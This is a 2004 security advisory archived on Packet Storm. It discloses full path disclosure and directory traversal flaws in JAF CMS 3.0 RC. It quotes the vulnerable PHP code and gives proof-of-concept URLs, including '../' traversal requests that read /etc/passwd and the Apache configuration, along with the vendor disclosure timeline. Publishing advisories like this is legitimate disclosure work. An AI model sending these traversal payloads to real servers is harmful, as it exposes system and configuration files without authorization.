what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Echo Security Advisory 2004.8

Echo Security Advisory 2004.8
Posted Nov 10, 2004
Authored by y3dips, Echo Security | Site y3dips.echo.or.id

JAF CMS is susceptible to path disclosure and directory traversal attacks.

tags | exploit
SHA-256 | 7072af4eb62c08137389015e4f2b4cd7805e59cbb744ba7cd4239a01a4338488

Echo Security Advisory 2004.8

Change Mirror Download


ECHO_ADV_08$2004

---------------------------------------------------------------------------
Vulnerabilities in JAF CMS
---------------------------------------------------------------------------

Author: y3dips
Date: November, 4th 2004
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv08-y3dips-2004.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

JAF CMS - ...just another flat file CMS, is a Content Management System (CMS)
consist of a powerful set of PHP scripts that allow you to maintain personal
home page. There is no need for a database. The pages stored in a simple flat
file. I've coded this script because I realize that its hard to found server
(especially free space) offering PHP with database support already.

Created by Salim "ph03y3nk"
Version affected : 3.0 Release Candidate , Not tested on 0ther Version
Mail Contact : ph03y3nk@users.sourceforge.net
URL: http://jaf-cms.sourceforge.net/

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Full path disclosure:

A remote user can access the file to cause the system to display an error
message that indicates the installation path. The resulting error message
will disclose potentially sensitive installation path information to the
remote attacker.


See the script in config.php

---snip---

function displaycontent() {
global $jaf;
if(file_exists("data/".$jaf['show'])) {
require_once ("data/".$jaf['show']);
$filemod = filemtime("data/".$jaf['show']);
$filemodtime = date("F j, Y", $filemod);
echo "This page last updated on : <strong>$filemodtime</strong>";
}
else {
if(file_exists("news/".$jaf['show'])) {
require_once ("news/".$jaf['show']);
}
else {
echo "<p align='center'><img src='images/403-error.gif'><br /><big>
<strong>Can't find the requested page, Sorry!!</strong></big></p>";
}
}
}

---snip---

in that files we can see that if we supply another name of page (which is not
in "data/" directory) , what we get is error message that define in the script
" Can't find the requested page, Sorry!! "

but what if we dont supply anything ? ,bummm ... weve got an error message that
display installation path.

POC :

http://localhost/jaf/index.php?show=

then we got an error

Warning: displaycontent(data/): failed to open stream: Success in
/var/www/html/jaf/config.php on line 129

Fatal error: displaycontent(): Failed opening required 'data/'
(include_path='.:/usr/share/pear') in /var/www/html/jaf/config.php on line 129



B. Path Traversal

Config.php files also vulnerable against basic path traversal attack which is
use "../" special character sequence to alter the resource location requested
in the URL. Consequently, the results can reveal source code because the file
is interpreted as text.

Exploit Code :

http://localhost/jaf/index.php?show=../../../../../../../etc/passwd
http://localhost/jaf/index.php?show=../../../../../../../etc/hosts
http://localhost/jaf/index.php?show=../../../../../../../etc/httpd/conf/httpd.conf


--------------------------------------------------------------------------

The fix:
~~~~~~~~

Vendor allready contacted and allready fix it, maybe the vendor will released
a new version .

------------------------- - -- --- -- - -
report to vendor 4-11-2004
vendor allready fix the bug 6-11-2004
advisories released to securityfocus.com 9-11-2004

---------------------------------------------------------------------------

Disclamier:
~~~~~~~~~~~

Advice, directions, instructions and script on security vulnerabilities
in this advisory for educational purpose, y3dips nor echo.or.id does not
accept responsibility for any damage or injury caused as a result of its use

---------------------------------------------------------------------------

Shoutz:
~~~~~~~

~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to @T echo/staff
~ yudhax, biatch-x, lieur-euy
~ newbie_hacker@yahoogroups.com ,
~ #e-c-h-o & #aikmel @DALNET

Greetz:
~~~~~~~

~ pho3y3nk , thx for "friendly" response. HOPE it would be a great CMS

---------------------------------------------------------------------------
Contact:
~~~~~~~~

y3dips || echo|staff || y3dips(at)echo(dot)or(dot)id
Homepage: http://y3dips.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close